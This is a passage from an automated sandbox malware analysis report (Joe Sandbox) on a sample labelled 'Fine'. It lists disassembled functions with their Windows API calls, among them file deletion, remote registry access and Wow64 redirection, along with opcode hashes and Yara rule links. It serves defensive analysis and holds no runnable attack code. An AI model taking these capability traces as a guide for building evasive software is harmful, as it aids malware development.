                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002345FD: GetClassNameW.USER32(?,?,000000FF), ref: 00234620
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 002327B3
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 002327C6
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 002327F6
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D8577: _wcslen.LIBCMT ref: 001D858A
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                                            • API String ID: 2081771294-1403004172
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 3687f904cdea2a4378a6f3dcbc67d3f86cff369ca335bd0b2d49a585e755da51
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 72b2f5fec711305fe6c6eb33d11365b29ac2f25d5f7adcbd57801f7cffa3d55f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3687f904cdea2a4378a6f3dcbc67d3f86cff369ca335bd0b2d49a585e755da51
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 752107B1E10108FEDB05ABA4DC89CFEB7B8DF55364F10412AF412A72E1DB745D1AD660
                                                                                                                                                                                                                                                                                                                            Function 002639B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00263A29
                                                                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(?), ref: 00263A30
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00263A45
                                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00263A4D
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                                                                                                            • String ID: SysAnimate32
                                                                                                                                                                                                                                                                                                                            • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 5c8124b503b15b806f9db490bd379c39947ee1db98a4dab51713ae801b2a4eb7
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 8477b6eec3f4cba64dd0c86154bceeda1541f4a09fb4c6bb8fb5ccdae5e15f7c
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c8124b503b15b806f9db490bd379c39947ee1db98a4dab51713ae801b2a4eb7
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F21A47261020AEFEF10CFA4DC84FBB77A9EB45364F105214FA91921D0C771DDA0AB60
                                                                                                                                                                                                                                                                                                                            Function 00269A25 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001D24B0
                                                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00269A5D
                                                                                                                                                                                                                                                                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00269A72
                                                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00269ABA
                                                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00269AF0
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                                                                                                                            • String ID: (*
                                                                                                                                                                                                                                                                                                                            • API String ID: 2864067406-1658319840
                                                                                                                                                                                                                                                                                                                            • Opcode ID: a70fd24cdba3e309f77eda6235e7d3c5a88913b73e60bfdd44b9ebb9f6532374
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 2ac78002c0fea1612710844d21998342e5827b4a2b7f3ee4b38c1274064ba7b0
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a70fd24cdba3e309f77eda6235e7d3c5a88913b73e60bfdd44b9ebb9f6532374
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1821BC35610018EFCF258F98D858EEA7BB9EB0A710F504069F9068B2A1DB719DE4DB60
                                                                                                                                                                                                                                                                                                                            Function 001D1AAC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001D24B0
                                                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 001D1AF4
                                                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 002131F9
                                                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00213203
                                                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 0021320E
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                                                                                                            • String ID: (*
                                                                                                                                                                                                                                                                                                                            • API String ID: 4127811313-1658319840
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 71103962fd05145ed7caac40d1216d81d5c7701b290eb4766aec947ff25658f3
                                                                                                                                                                                                                                                                                                                            • Instruction ID: b9ac4d1206395f182ca939c5a9f1a5d86a41dd67cc99142de35e1e9f69111ef6
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71103962fd05145ed7caac40d1216d81d5c7701b290eb4766aec947ff25658f3
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA114C31A0105AFBCB10DFA8E9499EE77B9EB05344F104452F912E3240C771BA91CBA1
                                                                                                                                                                                                                                                                                                                            Function 001F50DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,001F508E,?,?,001F502E,?,002998D8,0000000C,001F5185,?,00000002), ref: 001F50FD
                                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001F5110
                                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,001F508E,?,?,001F502E,?,002998D8,0000000C,001F5185,?,00000002,00000000), ref: 001F5133
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 804d7c7afde829ed13f71a31d9f296c501f09e0cf15659cb40242e2e480d3db0
                                                                                                                                                                                                                                                                                                                            • Instruction ID: cf866503f5c401df865ebc7105bc6d10bd2bf29cfdab3508d6e11155cbc0eece
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 804d7c7afde829ed13f71a31d9f296c501f09e0cf15659cb40242e2e480d3db0
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2F06830A0020CBBDB155F98EC4DBADBFB5EF49752F0440A4F909A6160DBB45D51DA94
                                                                                                                                                                                                                                                                                                                            Function 001D663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,001D668B,?,?,001D62FA,?,00000001,?,?,00000000), ref: 001D664A
                                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 001D665C
                                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,001D668B,?,?,001D62FA,?,00000001,?,?,00000000), ref: 001D666E
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                                                            • API String ID: 145871493-3689287502
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 135c33958dccfbbf298def4d4806c56dba3cd94029a97c8c4a3148ec6794c8f4
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 6f35307951275d2b8b22661b32d7aec753668bf3b2a3e6e5cd8e0506c381c81f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 135c33958dccfbbf298def4d4806c56dba3cd94029a97c8c4a3148ec6794c8f4
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4DE08C36B026261797222725BC0CA6A66289F93B26B0A4256F808E2304EBE4CC0280A4
                                                                                                                                                                                                                                                                                                                            Function 001D6607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00215657,?,?,001D62FA,?,00000001,?,?,00000000), ref: 001D6610
                                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 001D6622
                                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00215657,?,?,001D62FA,?,00000001,?,?,00000000), ref: 001D6635
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                                                            • API String ID: 145871493-1355242751
                                                                                                                                                                                                                                                                                                                            • Opcode ID: bf8bdebca548d5e63f8b78e84aeaa5dff2fa048b2d09450162d7ef8d7cc8805f
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 889428879b39639697e998854d01b8ca5d15085fb9e52dc22d84558462fb336b
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bf8bdebca548d5e63f8b78e84aeaa5dff2fa048b2d09450162d7ef8d7cc8805f
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4FD05B35F1253557473227257C1CD8F6B149ED3F1130D4056F804A6214CFE0CD11C5E8
                                                                                                                                                                                                                                                                                                                            Function 00243306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002435C4
                                                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 00243646
                                                                                                                                                                                                                                                                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0024365C
                                                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0024366D
                                                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0024367F
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: File$Delete$Copy
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3226157194-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: a6ddd764bd662b6da5f9e73cd0892abd13a2815f901d411230c0d0fba315ee25
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 3b0f8de420fffa90b3e0c73726edaab2e51cb8dacb5cd12a4bc9f1b3e8225e29
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a6ddd764bd662b6da5f9e73cd0892abd13a2815f901d411230c0d0fba315ee25
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9B15D72E1011DABDF15EFA4CC85EEEBBBDEF58314F4040A6F609A6141EB709A548F60
                                                                                                                                                                                                                                                                                                                            Function 0025ADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 0025AE87
                                                                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0025AE95
                                                                                                                                                                                                                                                                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0025AEC8
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0025B09D
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3488606520-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 1573241c4e57725a7043e4607a19dd9fa5f11605d3dfe718d8364b6bbddfe733
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 9ef9ce01e47262387208ed10d68ac41f57f39da8231b906aaef94e9fab008eb1
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1573241c4e57725a7043e4607a19dd9fa5f11605d3dfe718d8364b6bbddfe733
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2DA1BE71A04301AFE720DF24C886B2AB7E5AF54710F54885DF9999B3D2DBB1EC44CB81
                                                                                                                                                                                                                                                                                                                            Function 0025C429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0025C10E,?,?), ref: 0025D415
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D3F8: _wcslen.LIBCMT ref: 0025D451
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D3F8: _wcslen.LIBCMT ref: 0025D4C8
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D3F8: _wcslen.LIBCMT ref: 0025D4FE
                                                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0025C505
                                                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0025C560
                                                                                                                                                                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0025C5C3
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 0025C606
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0025C613
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 826366716-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: fcd5a71b7f6586ce78969544b7a22f620464944a6b8a0a3efd791f18100428b4
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 817647ebbc8db5762605bc83ef2015635cd4f28152995fe8f9acd3059b62e972
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fcd5a71b7f6586ce78969544b7a22f620464944a6b8a0a3efd791f18100428b4
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8619031218341AFC714DF54C890E2ABBE5FF84308F64855DF4569B292EB31ED49CB91
                                                                                                                                                                                                                                                                                                                            Function 0023ED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0023D7CD,?), ref: 0023E714
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0023D7CD,?), ref: 0023E72D
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023EAB0: GetFileAttributesW.KERNEL32(?,0023D840), ref: 0023EAB1
                                                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0023ED8A
                                                                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0023EDC3
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0023EF02
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0023EF1A
